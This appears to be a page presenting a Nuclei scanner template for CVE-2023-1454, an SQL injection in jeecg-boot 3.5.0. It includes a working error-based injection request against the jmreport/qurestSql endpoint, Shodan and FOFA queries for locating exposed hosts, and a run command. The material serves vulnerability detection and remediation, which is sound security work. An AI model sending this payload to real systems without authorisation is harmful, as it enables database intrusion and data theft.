Jeecg-boot 3.5.0 qurestSql - SQL Injection

ID: CVE-2023-1454

Severity: critical

Author: DhiyaneshDK

Tags: cve2023,cve,jeecg,sqli

Description

A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.

YAML Source

id: CVE-2023-1454

info:
  name: Jeecg-boot 3.5.0 qurestSql - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1454
    - https://vuldb.com/?ctiid.223299
    - https://vuldb.com/?id.223299
    - https://github.com/Awrrays/FrameVul
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1454
    cwe-id: CWE-89
    epss-score: 0.04509
    epss-percentile: 0.92282
    cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: jeecg
    product: jeecg-boot
    shodan-query: http.favicon.hash:1380908726
    fofa-query: icon_hash=1380908726
  tags: cve2023,cve,jeecg,sqli

http:
  - raw:
      - |
        POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SQLException"
          - "XPATH syntax error:"
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - "XPATH syntax error: '([a-z_@%]+)'"
          - "XPATH syntax error: '([a-z- @%]+)'"
          - "XPATH syntax error: '([a-z@%0-9.]+)'"
        part: body
# digest: 490a0046304402200c3e1b44ea592a6d2ce6cd7a7e7ccfc2fe1279c99fdbf2eb23dc1aa7c8163cc40220322bec769778d48ee4e546e89b1c5ade4854bb2e210480cc2550e362dcb24f75:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-1454.yaml"

View on Github